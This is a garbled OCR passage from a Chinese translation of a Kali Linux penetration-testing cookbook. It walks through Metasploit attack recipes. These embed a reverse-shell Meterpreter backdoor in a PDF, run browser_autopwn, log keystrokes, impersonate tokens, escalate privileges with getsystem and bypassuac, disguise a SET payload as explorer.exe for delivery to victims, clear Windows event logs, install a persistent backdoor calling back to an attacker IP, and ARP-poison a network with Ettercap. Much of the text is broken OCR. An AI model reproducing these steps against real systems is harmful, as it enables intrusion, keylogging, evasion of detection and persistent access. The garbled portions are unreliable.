
ie o yL lt ik E css - 


nics 


ActiveX Buffer Overflow 


a 


S/scada/igsss igssdataserver Listall 
anre s 


rada/i 
lata 
it/windows/scada/moxa mdmtool 
Device Manager 


io Lal 
- ESLEYM. 


Server/Collector 


Packet Handling 


lool 2.1 Buffer Overflow 
t/windows/sc 


HMI <= v1.11 


uL | 
a Tz 


Coreservice.axa Stack Buff 


rvar 
a/ragalwin on fc binfila a 
- 2 On FC CONNECT FCS a FILE Butte 
win on fcs login 
Login Buffer Overflow 
frealwin scpc 
SCPE INITIAL 
alwin SEBE 
C INITIAL 
exploit/windews/sce iro cmdexe 
soft ScadaPro <= 4.8.8 Remote Command Execution 
| explait/windows/scada/winlog runtime 
Loo Sistemi Winlog Buf i 


xploit/wind 
RealWin SCADA 5 
it wl aT [uj T 
SCADA Serwer De 
exploit /windcows/sca 
AC RealWin SCADA Se 


exo eR WINdows, cad 


Lwin 


da 
i 


fer Overflow 


IFIP 43.10 Writable L lPaversal Exeeut ion 


tinet 


4. 使 用 PDF A ak 4x24 : 


i; is. ps. vns fae 
(lls) © Gils! ETE 
fy ae ee oid 
BB ag 
[a (a L BTE L [2 ra 


ama Buffer Over 


Vulnerabili 


Uvert Low 


r Overfl 


iw 


BG Gl Wi! Ge 
88:86: BE 


ILICE DID E ea 


use exploit/windows/fileformat/adobe pdf embedded exe 


5. 显示 模 块 的 可 用 选项 。 


show options 


average 
good 
good 
good 
normal 
axcaLllent 


great 


T4 





maf exploit( adobe pdf embedded exe) > show 


Module options [exploit /windows/fileformat/adob 


Name Currant Setting 


Required Description 


EXENAMI 


"nc 
FILENAME 
nio 
INFILENAME 
yes The Input POF filename 
LAUNCH MESSAGE To view the encrypted content please tick the "Do not show this message again" box and press 


Üpen. no The massage to display in the File: area 


Exploit target: 


Adobe Reader v.x, vw9.x (Windows XP SP3 English/Spanish} 





DAE exploit(adobe pdf embedded ekej > || 


6. 设置 我 们 想 要 生成 的 PDF 文件 名 称 : 


set FILENAME evildocument.pdf 


7. 设置 INFILENAME 选项 。 它 是 你 打算 使 用 的 PDF 文件 的 位 置 。 这 里 ， 我 使 用 桌面 上 的 
简历 。 


set INFILENAME /root/Desktop/willie. pdf 


Ww oL. 2 A FIL DAE 4 o tp ee | op ot AA a Qc See 
SIE TS 9 PARA NPT A AMARE oY > PR) INFILENAM 





[TI 


8. 执行 漏洞 利用 : 


Exploit 


Reading in '/root/Desktop/willie.pdf'... 
Parsing '/root/Desktop/willie.pdf'... 


Parsing Successful. 

Using 'windows/meterpreter/reverse tcp' as payload... 
Creating 'evildocument.pdf' file... 

evildocument.pdf stored at /root/.msf4/local/evildocument. pdf 
expLoit(adobe pdf embedded exe) > 


Py FP FP P| FP EF] 


中 


i 
| 
*] 
*] 
] 
f 





un 


工作 原理 


这 个 秘籍 中 ， 我 们 使 用 Metasploit 的 MSFCONSOLE 创建 了 包含 Meterpreter 后 门 的 PDF x 
件 。 我 们 以 启动 控制 台 并 搜索 所 有 可 用 的 PDF 漏洞 来 开始 。 在 选择 PDF ARRERA” X 
们 设置 选项 并 执行 漏洞 利用 ， 这 让 我 们 在 正常 的 PDF 中 埋 下 后 门 程序 。Metasploit 会 生成 带 
有 Windows & TCP 载荷 的 PDF。 当 你 的 目标 打开 PDF 文件 时 ，Meterpreter 会 开启 答复 
并 激活 会 话 。 


6.10 3x: J, browser_autopwn 
浏览 器 Autopwn Æ Metasploit 提供 的 辅助 模块 ， 在 受害 者 访问 网 页 时 ， 让 你 能 够 自动 化 对 它 


nx. &| 3 2$ Autopwn 在 攻击 之 前 指定 客户 端的 指纹 识别 ， 也 就 是 说 他 不 会 对 IE 7 尝试 
利用 Firefox -— o 基于 它 的 浏览 器 判断 ， 它 决定 最 适 于 实施 哪个 漏洞 利用 。 


准备 
需要 互联 网 或 内 部 网 络 的 连接 。 


ARTE DY 


让 我 们 通过 打开 终端 窗口 来 开始 这 个 秘籍 : 


2. J2 34 MSFCONSOLE : 


msfconsole 


3. 搜索 可 用 的 autopwn 模块 。 


msfconsole autopwn 


Matching Modules 


Name 


auxiliary/server/browser autopwn normal HTTP Client Automatic Exploitar 





msf exploiti |) > use auxiliary/server/browser autopwn 


4. 使 用 browser_autopwn 模块 : 


Use auxiliary/server/browser_autopwn 


5. HK BRI Re > 3x € &411$ Windows & TCP : 


set payload windows/meterpreter/reverse_tcp 


show options 


10. 


11. 


12. 


13. 


14. 


设置 反 向 连接 所 使 用 的 |P。 这 里 ， 该 PC 的 IP 地址 为 192.168.10.109 ° 


set LHOST 192.168.10.109 


下 面 ， 我 们 打算 设置 URIPATH， 这 里 我 们 使 用 "filetypes" ( #4] >) 
set URIPATH "filetypes" 
最 后 ， 我 们 执行 漏洞 利用 : 


exploit 


Metasploit 会 在 IP 地 址 <http://[Provided IP Address]:8080> 处 执行 漏洞 利用 。 


当 访 问 者 访问 这 个 地 址 时 * browser_autopwn 模块 尝试 连接 用 户 的 机 器 来 建立 远程 会 话 。 
如 果 成 功 的 话 ，Meterpreter 会 确认 这 个 会 话 。 使 用 会 话 命令 来 激活 它 : 


session -I 1 

为 了 显示 我 们 可 以 使 用 的 Meterpreter 命令 列表 ， 输 入 help 。 
help 

会 显示 可 用 命令 的 列表 。 这 里 ， 我 们 启动 击 键 顺序 扫描 : 
keyscan_start 

为 了 得 到 受害 者 机 器 上 的 击 键 顺序 ， 我 们 键入 keyscan start 命令 : 


keyscan_dump 


工作 原理 


这 个 秘籍 中 ， 我 们 使 用 Metasploit 的 MSFCONSOLE 来 执行 browser autopwn 漏洞 利用 。 

我 们 以 启动 控制 人 台 并 搜索 所 有 已 知 的 autopwn 模块 开始 。 在 喧 咒 autopwn 模块 之 后 ， 我 们 将 

RFI a A windows reverse tcp 。 这 允许 我 们 在 利用 成 功 时 得 到 返回 的 链接 。 一 旦 受害 者 访 
问 了 我 们 的 网 页 ， 漏 洞 利用 就 成 功 了 ， 我 们 就 能 得 到 Meterpreter 活动 会 话 。 


第 七 草 权限 提升 


作者 : Willie L. Pritchett, David De Smet 
译 者 : 飞龙 


tit : CC BY-NC-SA 4.0 
KA 
简介 


我 们 已 经 获得 了 想 要 攻击 的 计算 机 的 权限 。 于 是 将 权限 尽 可 能 提升 就 非常 重要 。 通 常 ， 我 们 
能 访问 较 低 权 限 的 用 户 账 户 (计算 机 用 户 ) ， 但 是 ， 我 们 的 目标 账户 可 能 是 管理 员 账 户 。 这 
一 草 中 我 们 会 探索 几 种 提升 权限 的 方式 。 


7.1 使 用 模拟 令 牌 


这 个 秘籍 中 ， 我 们 会 通过 使 用 模拟 令 牌 ， 模 拟 网 络 上 的 另 一 个 用 户 。 令 牌 包 含 用 于 登录 会 话 
和 识别 用 户 、 用 户 组 合用 户 权 限 的 安全 信息 。 当 用 户 登 入 Windows 系统 是 ， 它 们 会 得 到 一 个 
访问 令 牌 ， 作 为 授权 会 话 的 一 部 分 。 令 牌 模拟 允许 我 们 通过 模拟 指定 用 户 来 提升 自己 的 权 
限 。 例 如 ， 系 统 账户 可 能 需要 以 管理 员 身 份 运行 来 处 理 特 定 的 任务 。 并 且 他 通常 会 在 结 来 后 
让 渡 提 升 的 权限 。 我 们 会 使 用 这 个 弱点 来 提升 我 们 的 访问 权限 。 
准备 
为 了 执行 这 个 秘籍 ， 我 们 需要 : 

e 内 部 网 络 或 互联 网 的 连接 。 


e ZEAN HIEI 


TRE y HR 


我 们 从 Meterpreter 开始 探索 模拟 令 牌 。 你 需要 使 用 Metasploit 来 攻击 主机 ， 以 便 获 得 
Meterpreter shell。 你 可 以 使 用 第 六 章 的 秘籍 之 一 ， 来 通过 Metasploit 获得 访问 权限 。 





下 面 是 具体 步骤 : 


我 们 可 以 在 Meterpreter 使 用 incognito 来 开始 模拟 过 程 


use incognito 


2. 展示 incognito 的 帮助 文档 ， 通 过 输入 help 命令 


help 





4 T«r GRE PHAR REAP XGaDEÉATYZA S Ad guru 
我 们 可 以 通过 以 -u 执行 list tokens 命令 来 完成 它 。 


list tokens -u 





5. 下面， 我 们 执行 模拟 攻击 。 语 法 


是 impersonate_token [name of the account to impersonate] ° 


impersonate_token \\willie-pc\willie 


' 我 们 选择 一 个 shell 命令 来 运行 。 如 果 我 们 成 功 了 ， 我 们 就 以 另 一 个 用 户 的 身份 在 
25m AF 


工作 原理 


这 个 秘籍 中 ， 我 们 以 具有 漏洞 的 主机 开始 ， 之 后 使 用 Meterpreter 在 这 台 主 机 上 模拟 另 一 个 用 
户 的 令 牌 。 模 拟 攻击 的 目的 是 尽 可 能 选择 最 高 等 级 的 用 户 ， 最 好 是 同样 跨 域 连接 的 某 个 人 ， 
并 且 使 用 它们 的 账户 来 深入 挖掘 该 网 络 。 


7.2 本 地 提 权 攻击 


这 个 秘籍 中 ， 我 们 会 在 一 人 台 有 具 有 汤 洞 的 主机 上 进行 提 权 。 本 地 提 权 允许 我 们 访问 系统 或 域 的 
用 户 账户 ， 从 而 利用 我 们 所 连接 的 当前 系统 。 
准备 
为 了 执行 这 个 秘籍 ， 我 们 需要 : 
e 内 部 网 络 或 互联 网 的 连接 。 


e 使 用 Metasploit 框架 的 具有 漏洞 的 主机 。 


操作 步骤 


让 我 们 在 Meterpreter shell 中 开始 执行 本 地 提 权 攻击 。 你 需要 使 用 Metasploit 攻击 菜 个 主机 


来 获得 Meterpreter shell。 你 可 以 使 用 第 六 章 的 秘籍 之 一 ， 来 通过 Metasploit 获得 主机 的 访 
Be 


A 


1. 一 旦 你 通过 Metasploit 和 Meterpreter shell 获得 了 受害 者 的 访问 权限 ， 等 待 你 的 
Meterpreter 显示 提示 符 。 





2. 下面， 使 用 -h 选项 查看 getsystem 的 帮助 文件 : 


getsystem -h 


3， 最 后 我 们 不 带 任 何 选 项 来 运行 getsystem 


getsystem 


如 果 你 尝试 获得 Windows 7 主机 的 访问 ， 你 必须 在 执行 getsystem 命令 之 前 执 
行 bypassuac ° bypassuac 允许 你 绕 过 微软 的 用 户 账 户 控制 。 这 个 命令 这 样 运 


行 : run post/windows/escalate/bypassuac ° 


4. 下面 ， 我 们 执行 最 后 的 命令 来 获取 访问 。 


5， 这 就 结束 了 。 我 们 已 经 成 功 进 行 了 提 权 攻击 。 


工作 原理 


这 个 秘籍 中 ， 我 们 使 用 了 Meterpreter 对 受害 者 的 主机 进行 本 地 提 权 攻击 。 我 们 从 
Meterpreter 中 开始 这 个 秘籍 。 之 后 我 们 执行 了 getsystem 命令 ， 它 允许 Meterpreter 尝试 在 
系统 中 提升 我 们 的 证 书 。 如 果 成 功 了 ， 我 们 就 有 了 受害 者 主机 上 的 系统 级 访问 权限 。 


7.3 掌握 社会 工程 工具 包 (SET) 


这 个 秘籍 中 ， 我 们 会 探索 社会 工程 工具 包 (SET) 。SET oe 些 工 具 的 框架 ， 让 你 能 
够 通过 骗术 来 攻击 受害 者 。SET 由 David Kennedy 设计 。 这 个 工具 很 快 就 成 为 了 渗透 测试 者 
工具 库 中 的 标准 。 


操作 水 对 
掌握 SET 的 步骤 如 下 所 示 。 


1， 打 开 终 端 留 口 ， 通 过 按 下 终端 图 标 ， 并 访问 SET 所 在 的 目录 : 


se-toolkit 


2.， 完 成 之 后 ， 你 会 看 到 SET 菜单 。SET 菜单 有 如 下 


Social-Engineering Attacks (社会 工程 攻击 ) 

Fast-Track Penetration Testing (快速 跟踪 渗透 测试 ) 

Third Party Modules (第 三 方 模块 ) 

Update the Metasploit Framework (更 新 Metasploit 框架 ) 
Update the Social-Engineer Toolkit (更 新 社会 工程 工具 包 ) 
Update SET configuration (更 新 SET 配置 ) 

Help, Credits, and About (帮助 ， 作 者 和 关于 ) 

Exit the Social-Engineer Toolkit (退出 社会 工程 工具 包 ) 


二 十 十 十 十 十 十 十 


在 进行 攻击 之 前 ， 最 好 先 将 升级 SET ， 因 为 作者 经 常会 升级 它 。 


V 


些 选项 如 下 图 所 示 : 


'[1(img/7-3-1.jpg) 


1， 出 于 我 们 的 目的 ， 我 们 选择 第 一 个 选项 来 开始 社会 工程 攻击 : 


2， 我 们 现在 会 看 到 社会 工程 攻击 的 列表 ， 它 们 展示 在 下 面 的 截图 中 。 出 于 我 们 的 目的 ， 我 
们 使 用 create a Payload and Listener ( €] Xp fe MTA > X65 4) 。 


The Social-Engineer Toolkit is a product of TrustedSec, 


Visit: htt 


Select f rom tha Meri. 


1) Spe@ar-Phishing Attack Vectors 
2] Website Attack Vectors 

3) Infectious Media Generator 

4) Create a Payload and Listener 
5) Mass Mailer Attack 

6) Arduino-Based Attack Vector 

7) SMS Spoofing Attack Vector 

8) Wireless Access Point Attack Vector 
9) QRCode Generator Attack Vector 
180] Powershell Attack Vectors 

11) Third Party Modules 


to the main menu. 





下 面 ， 我 们 被 询问 输入 载荷 的 IP 来 反 转 链接 。 这 里 ， 我 们 输入 我 们 的 IP 地 址 : 


192.168.10.109 





> Enter the IP address for the payload (reverse) :§ 


Uk 278 BY BR Hey YF Fe Fe HG watt ， 它们 为 Payload and Listener 选项 生成 o Xt 
择 windows Reverse TCP Meterpreter 。 这 会 让 我 们 连接 到 目标 上 ， 并 对 其 执行 
Meterpreter 载荷 。 


What payload do you want 1 marate 


LE ge 
Nama : 


Rewers za ILH 
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Ep YNE DLL 


Shall 


Rev 
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SE Toolkit HTTP Reverse 
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Import 
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Windows 


SE 


5 hol 
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I 


' 我 们 被 询问 作为 监听 器 端口 的 


听 
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Created by msfpayload (ht 

Payload: 

Lengtn: 

Options: 

a Your 
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wil! pli dows 
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人 ü an 让 oda rs = 
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Ee = Ed 
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Soda 8 cO 
Spawn 
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nis will 
his will drop multiple Metasploit 


root 
ne: gai in the 
[yes/no]: 


到 Metasploit 打开 了 一 个 处 理 


search YOu! 


Description: 


mmand shell oan 
a moterpreter shel 

victim and 
6 poy: Load and create | AGER 
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the attac "ker [Winda 
and find 
communication- over HT 
i of an IF 
toolkit 
TIF shell with AES 
a Duy that will t 
4 meterpreter payloa 
meterprater 


Eo 


back 
moterpreter shell 
P Usin 


a 


[ ive reverse 

aly Antive: 

bypass 

č “| ro p 
rop a 
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> 输入 Yes : 


met: 


/x64/met par reversa | 
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SET home directory 
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and services 
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c/program junk, 
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aL Srey Program 


ef xe 
resource 
HOST 


EL 


junk/ mete 


SOWrC LS sh aro set /Ssre, junk mat 


‘or og ram 


FUST} t,/src/program_junk/met 


(/usr/share/ ‘Src unk mat 
running as backgra 
handler) + 
andier 
load handler.. 


m /Pragram j 
Le und job, 


ap 
xp! 
mixing 


ing the pay 


reverse h 


met a cu 


if post 


‘mata BOO Ea: 
fig). 
3 config)» 


xpiol 


3 n E a 


| config): 


a config): 


config) 


a config): 


SB 


WS 
a port home via multiple pe 


I: [e jn] 


aye 


Own Uta 


sand Back ta : 
and send back 
nd back to att 
ting port on 
Intl in 
LP 


acker 
reamete 
ü 
et 


Inline 
x64), Meterpreter 


g SSL and use Meterpreter 
Ss and spawn Meterpreter 
i for SET 
ryption Suppo rt 
unnel all comms Di 
a vill L2 - TM NS Axe 
可 站 PyInjector 


thrag 
pay Loads via memo ry 


rā 


Bu 


[= 


SET as msf.e 


选择 了 443， 所 以 我 们 就 选择 它 


ts 








这 个 秘籍 中 ， 我 们 探索 了 SET 的 用 法 。SET 拥有 菜单 风格 的 接口 ， 使 它 易 于 生成 用 于 坎 骗 受 
害 者 的 工具 。 我 们 以 初始 化 SET 开始 ， 之 后 ，SET 为 我 们 提供 了 几 种 攻击 方式 。 一 旦 我 们 选 
择 了 它 ，SET 会 跟 Metasploit 交互 ， 同 时 询问 用 户 一 系列 问题 。 在 这 个 秘籍 的 和 最后， 我 们 创 
建 了 可 执行 文件 ， 它 会 提供 给 我 们 目标 主机 的 Meterpreter 活动 会 话 。 


P 


作为 替代 ， 你 可 以 从 桌面 上 启动 SET， 访 


ha Applications | Kali Linux | Exploitation Tools | Social Engineering Tools | Social Engin 


1. 在 SET 目录 下 ， 你 胡 注 意 到 有 个 EXE 文件 叫做 msf.exe ° HEA enon Scere meres 
会 引起 怀疑 的 名 称 。 这 里 ， 我 们 将 它 改 为 explorer.exe 。 最 开始 ， 我 们 打开 终端 窗口 并 
访问 SET 所 在 的 目录 。 

cd /usr/share/set 

2. 之 后 我 们 获得 目录 中 所 有 项 目的 列表 。 

ls 


3. 之 后 我 们 将 这 个 文件 重 命名 为 explorer.exe 


mv msf.exe explorer.exe 


modules README.txt 
readme reports 
sh Ti Fi: p 





4. 现在 我 们 压缩 explorer.exe RET ° iX € > ZIP 归档 叫做 healthyfiles ° 


zip healthyfiles explorer.exe 


5， 既 然 你 已 经 拥有 了 ZIP 归档 ， 你 可 以 把 文件 以 多 种 方式 分 发 给 受害 者 。 你 
邮件 来 传递 ， 也 可 以 放 进 U 总 并 手动 在 受害 者 机 器 中 打开 ， 以 及 其 它 。 探 索 设 
给 你 想 要 的 结果 来 达成 你 的 目标 。 
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7.4 收集 受害 者 数据 


这 个 秘籍 中 ， 我 们 会 探索 如 何 使 用 Metasploit 来 收集 受害 者 的 数据 。 有 几 种 方式 来 完成 这 个 
任务 ， 但 是 我 们 会 探索 在 目标 机 器 上 记录 用 户 击 键 顺 厚 的 方式 。 收 集 受 害 者 数据 可 以 让 我 们 
获得 潜在 的 额外 信息 ， 我 们 可 以 将 其 用 于 进一步 的 攻击 中 。 对 于 我 们 的 例子 ， 我 们 会 收集 目 
te $ALE PAM EP o 


准备 
为 了 执行 这 个 秘籍 ， 我 们 需要 : 
e 内 部 网 络 或 互联 网 的 连接 。 
e 使 用 Metasploit 框架 的 具有 漏洞 的 主机 。 
Te TE iy JE 
让 我 们 开始 通过 Meterpreter shell 来 收集 受害 者 数据 。 你 需要 使 用 Metasploit 攻击 茶 个 主机 


来 获得 Meterpreter shell。 你 可 以 使 用 第 六 章 的 秘籍 之 一 ， 来 通过 Metasploit 获得 目标 主机 的 
访问 。 


1. 一 旦 你 通过 Metasploit 和 Meterpreter shell 获得 了 受害 者 的 访问 权限 ， 等 待 你 的 
Meterpreter 显示 提示 符 。 





2. 下面， 我 们 执行 下 面 的 命令 来 开启 键盘 记录 器 : 


keyscan_start 





3， 最 后 ， 我 们 输入 keyscan_dump 命令 ， 将 用 户 的 击 键 顺序 输出 到 屏幕 上 。 


keyscan_dump 


工作 原理 


这 个 秘籍 中 ， 我 们 使 用 Meterpreter 收集 了 受害 者 的 数据 。 


P 


有 一 种 不 同 的 方式 ， 你 可 以 使 用 它们 来 收集 受害 者 机 器 上 的 数据 。 这 个 秘籍 中 ， 我 们 使 用 了 
Metasploit 和 Metasploit keyscan 来 记录 击 键 顺 厚 ， 但 是 我 们 也 可 以 使 用 Wireshark 或 
airodump-ng 来 更 简单 地 收集 数据 。 


这 里 的 关键 是 探索 其 它 工 具 ， 便 于 你 找到 最 喜欢 的 工具 来 完成 你 的 目标 。 
7.5 清理 踪迹 
这 个 秘籍 中 ， 我 们 会 使 用 Metasploit 来 清除 我 们 的 踪迹 。 在 黑 进 主机 之 后 执行 清理 是 个 非常 
重要 的 步骤 ， 因 为 你 不 想 在 经 历 所 有 麻烦 来 获得 访问 权限 之 后 还 被 人 查 水 表 。 弟 运 的 是 ， 
Metasploit 拥有 一 种 方式 来 非常 简单 地 清除 我 们 的 踪迹 。 
准备 
为 了 执行 这 个 秘籍 ， 我 们 需要 : 
o 内 部 网 络 或 互联 网 的 连接 。 


e 使 用 Metasploit 框架 的 具有 漏洞 的 主机 。 


操作 步骤 


需要 执行 步骤 如 下 所 示 : 


1. 让 我 们 开始 使 用 Meterpreter shell 来 清理 我 们 的 踪迹 。 你 需要 使 用 Metasploit 攻击 茶 个 
主机 来 获得 Meterpreter shell。 你 可 以 使 用 第 六 草 的 秘籍 之 一 ， 来 通过 Metasploit 获得 目 
标 主机 的 访问 。 一 旦 你 通过 Metasploit 和 Meterpreter shell 获得 了 受害 者 的 访问 权限 ， 
等 待 你 的 Meterpreter 显示 提示 符 。 





2 下面 ， 我 们 需要 运行 |RB， 以 便 进 行 日 志 移 除 操 作 。 我 们 打开 帮助 文件 : 





3. 下面， 我 们 告诉 IRB 要 移 除 哪个 文件 。 下 面 是 一 个 可 用 的 选择 


log = client.sys.eventlog.open('system') 

log = client.sys.eventlog.open('security') 

log = client.sys.eventlog.open('application') 

log = client.sys.eventlog.open('directory service!) 

log = client.sys.eventlog.open('dns server' ) 

log = client.sys.eventlog.open('file replication service' ) 


4.， 出 于 我 们 的 目的 ， 我 们 把 它们 都 清理 挥 。 你 需要 将 这 些 一 次 键入 : 


log = client.sys.eventlog.open('system') 

log = client.sys.eventlog.open('security') 

log = client.sys.eventlog.open('application') 

log = client.sys.eventlog.open('directory service' ) 

log = client.sys.eventlog.open('dns server' ) 

log = client.sys.eventlog.open('file replication service' ) 


5. 现在 我 们 执行 命令 来 清理 日 志文 件 : 


Log.clear 


6. ix xz 去 来 了 。 o 我 们 只 用 了 这 SAJA 


> 


清理 我 们 的 踪迹 


工作 原理 


这 个 秘籍 中 ， 我 们 使 用 Meterpreter 来 清理 我 们 在 目标 主机 上 的 踪迹 。 我 们 从 Meterpreter 中 
开始 这 个 秘籍 ， 并 启动 了 IRB (一 个 Ruby 解释 器 shell) 。 下 面 ， 我 们 指定 了 想 要 清理 的 文 
件 ， 并 且 最 后 键入 了 Log.clear 命令 来 清理 日 志 。 要 记 住 ， Bose 里 进 了 某 个 主机 ， 你 需 


要 在 最 后 执行 这 一 步 。 你 不 能 在 清理 踪迹 之 后 再 执行 更 多 的 操作 ， 只 会 更 加 更 多 的 日 志 
de Ha 


7.6 创建 永久 后 门 


这 个 秘籍 中 ， 我 们 会 使 用 Metasploit persistence 来 创建 永久 后 门 。 一 旦 你 成 功 获得 了 目标 机 
器 的 访问 权限 ， 你 需要 探索 重新 获得 机 器 访问 权 的 方式 ， 而 不 需要 再 次 黑 进 它 。 如 果 目 标 机 
人 一 些 事情 来 终端 连接 ， 比 如 重启 机 器 ， 后 门 的 作用 就 是 允许 重新 建立 到 你 机 器 

的 连接 。 这 就 是 创建 后 门 非常 方便 的 原因 ， 它 可 以 让 你 控制 目标 机 器 的 访问 。 

准备 

为 了 执行 这 个 秘籍 ， 我 们 需要 : 


e 内 部 网 络 或 互联 网 的 连接 。 


e 使 用 Metasploit 框架 的 具有 漏洞 的 主机 。 


操作 步骤 


让 我 们 开始 植 入 我 们 的 永久 后 门 。 你 需要 使 用 Metasploit 攻击 某 个 主机 来 获得 Meterpreter 
shell。 你 可 以 使 用 第 六 章 的 秘籍 之 一 ， 来 通过 Metasploit 获得 目标 主机 的 访问 。 


1， 一 旦 你 通过 Metasploit 和 Meterpreter shell 获得 了 受害 者 的 访问 权限 ， 等 待 你 的 
Meterpreter 显示 提示 符 。 





2. 下面， 我们 需要 运行 persistence， 以 便 创建 我 们 的 后 门 。 我 们 打开 帮助 文件 : 


run persistence -h 


自动 启动 一 个 匹配 的 多 重 处 理 器 来 链接 到 代理 端 。 
o -Ss :这 个 选项 让 后 门 上 自 动 化 启动 为 系统 服务 。 
o .U :这 个 选项 让 后 门 在 用 户 司 动 系统 时 目 动 局 
o -i :这 个 选项 设置 两 次 党 试 回复 攻击 者 机 器 之 间 的 秒 数 。 
o -p :这 个 选项 设置 攻击 者 机 器 上 Metasploit 的 监听 端口 。 


o .p :这 个 选项 设置 所 用 的 载 柯 。 默 认 使 用 Reverse tcp ， 并 且 它 通常 是 你 想 使 用 的 


o -r :这 个 选项 设置 攻击 者 机 器 的 IP 地 址 。 


4. 现在 ， 我 们 执行 命令 来 建立 后 门 : 


run persistence -U -A -1 10 - 8090 -r 192.168.10.109 


后 门 现在 已 经 建立 了 。 如 果 成 功 的 话 ， 你 会 注意 到 你 有 了 第 二 个 Meterpreter A% » 





工作 原理 


这 个 秘籍 中 ， 我 们 使 用 Meterpreter 来 建立 永久 后 门 。 我 们 在 黑 进 目标 主机 并 获得 
Meterpreter shell 之 后 开始 了 这 个 秘籍 。 之 后 我 们 通过 浏览 帮助 文档 那个 ， 探 索 了 一 些 可 用 的 
永久 化 方式 。 最 后 ， 我 们 通过 运行 安装 命令 并 设置 它 的 选项 来 完成 后 门 的 安装 。 


7.7 FHA (MITM) 攻击 


这 个 秘籍 中 ， 我 们 会 对 目标 进行 中 间 人 (MTM) x x o MITM EARNAN B dfe BIA 
的 通信 。 在 我 们 的 例子 中 ， 当 某 个 Windows 主机 在 http://www.yahoo.com 收 发 邮件 时 ， 我 们 
使 用 Ettercap *& £2 9r € 8 38 48 


准备 
为 了 执行 这 个 秘籍 ， 我 们 需要 : 
e 无 线 网 络 连 接 

连接 到 无 线 网 络 的 机 器 
RAE TK 


让 我 们 启动 Ettercap 来 开始 中 间 人 攻击 。 


.打开 终端 窗口 并 启动 Ettercap。 使 用 -6 选项 加 载 GUI : 


ettercap -G 


* ettercap 0.7.4.1 














我 们 以 打开 unified sniffing 《统一 噢 探 ) 开始 。 你 可 以 按 下 shift + u 或 者 访问 菜单 
中 的 sniff | Unified sniffing ° 


| ettercap 0.7.4.1 





先 择 网 络 接口 。 在 发 起 MTM 攻击 的 情况 中 ， 我 们 应 该 选项 我 们 的 无 线 接口 。 





| * ettercap Input 


- Network interface : [tho +l 


| OK | Cancel | 














下 面 ， 我 们 打开 scan for hosts (扫描 主机 ) 。 可 以 通过 按 下 ctrl + s 或 访问 菜单 栏 


的 Hosts | Scan for hosts 来 完成 ° 





下 面 ， 我 们 得 到 了 Host List (主机 列表 ) 。 你 可 以 按 下 H 或 者 访问 菜单 栏 


的 Hosts | Host List ° 


x ettercap 0.7.4.1 






C+. 4 T EU ZIEL | cre "LIFT j E m ME E ETT 
Start Targets Hosts View Mitm Filters Le 


| re ee Vw 
Hosts list 





| Host List X | 





Ga.. BETTER 
neon m = Scan for hosts 


| 10.0.2.2 z; Loadi from file... 
| 10.0.2.3 z  Saveto file... 





我 们 下 面 需要 选择 或 设 mad 的 目标 。 在 我 们 的 例子 中 ， 我 们 选择 192.168.10.111 作为 
我 们 的 Target 1 ， 通 过 选中 它 的 IP 地 址 并 按 下 Add To Target 1 (添加 到 目标 1) dE 
EA o 


x ettercap 0.7.4.1 


F-Tgal zig. | fe 



































IP Address 


192.168.10.102 00:00:93:7A:EA:CB8 
192.168.10.107 00:18:E7:07:BE:70 
192.168.10.108  00:08:5D:29:28:FF 
192.168.10.110 00:02:A5:B1:EB:UF 
192.168.10.111 08:00:27:17:81:3C 
192.168.10.112 08:00:27:19:BD:88 
197.168.10.150 00:80: 7 7:0 F:80:A3 


Delete Host | Add to Target 1 | Add to Target 2 


55 ports monitored 
7587 mac vendor fingerprint 
1766 tcp O5 fingerprint 
12183 known services 
Randomizing 255 hosts for scanning... 
Scanning the whole netmask for 255 hosts... 
9 hosts added to the hosts list... 





7. 现在 我 们 能 够 让 Ettercap 开始 噢 探 了 。 你 可 以 按 下 ctrl +w 或 访问 菜单 栏 


的 Start | Start sniffing ° 


* ettercap 0.7.4.1 





8. me > RIIAT ARP 毒化 。 访 问 菜单 栏 的 Mitm | Arp poisoning ° 


ettercap 0.7.4.1 


| W. i = 
Ww Mitm 





o. 在 出 现 的 窗口 中 选中 Sniff remote connections ( 嗅 探 远程 连接 ) 的 选项 j 


MITM Attack: ARP Poisoning 


Optional parameters 
O Only poison one-way. 


| OK | | Cancel | 





10. 取决 于 网 络 环境 ， 我 们 会 看 到 信息 。 


* ettercap 0.7.4.1 


[ D. 
- | ii D 1 1 
1} 1 r | = 








7587 mac vendor fingerprint 

1766 tcp OS fingerprint 

2183 known services 

Randomizing 255 hosts for scanning... 
Scanning the whole netmask for 255 hosts... 
3 hosts added to the hosts list... 

Starting Unified sniffing... 


ARP poisoning victims: 


GROUP 1: ANY (all the hosts in the list) 


GROUP 2 : ANY (all the hosts in the list) 


x 


11. 一 旦 我 们 找到 了 想 要 找 的 信息 (APARRA) 。 我 们 可 以 关闭 Ettercap。 你 可 以 按 
下 ctrl +E 或 访问 菜单 栏 的 start | Stop sniffing 来 完成 它 。 





12. 现在 我 们 关闭 ARP 毒化 ， 使 网 络 恢复 正常 。 





这 个 秘籍 包括 MITM 攻击 ， 它 通过 ARP & ETUR £2 9T 93 JE] P Fr Ar 89 75 8 de 


你 可 以 通过 浏览 http://en.wikipedia.org/wiki/Man-in-the- 
middle_attack#Example of an attack 来 了 解 更 多 关于 MITM 的 信息 。 
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第 八 草 密码 攻击 


作者 : Willie L. Pritchett, David De Smet 
译 者 : 飞龙 
协议 : CC BY-NC-SA 4.0 


这 一 章 中 ， 我 们 要 探索 一 些 攻击 密码 来 获得 用 户 账户 的 方式 。 密 码 破 解 是 所 有 渗透 测试 者 都 
需要 执行 的 任务 。 本 质 上 ， 任 何 系统 的 最 不 安全 的 部 分 Re 
略 如 何 ， 人 们 必然 讨厌 输入 强 冤 码 ， 或 者 时 党 更 新 它们 。 这 会 使 它们 多 于 成 为 黑客 的 目标 。 


8.1 4€ 2X, 98 4D XX h 


这 个 秘籍 中 我 们 会 使 用 Hydra 密码 破解 器 。 有 时 候 我 们 有 机 会 来 物理 攻击 基于 Windows 的 计 
算 机 ， 直 接 获 取 安 全 账户 管理 器 (SAM) 。 但 是 ， 我 们 也 有 时 不 能 这 样 做 ， 所 以 这 是 在 线 密 
码 攻击 具有 优势 的 情况 。 


Hydra 支持 许多 协议 ， 包 括 (但 不 仅 限 于 ) FTP、HTTP、HTTPS、MySQL、MSSQL、 
Oracle ` Cisco ` IMAP ` VNC 和 更 多 的 协议 。 需 要 注意 的 是 ， 由 于 这 种 攻击 可 能 会 产生 嗓 
声 ， 这 会 增加 你 被 侦 测 到 的 可 能 。 

准备 

需要 内 部 网 络 或 互联 网 的 链接 ， 也 需要 一 台 用 作 受 害 者 的 计算 机 。 

dk TE v 3 


TE RAII 36 RAR Te 2R RAG o 
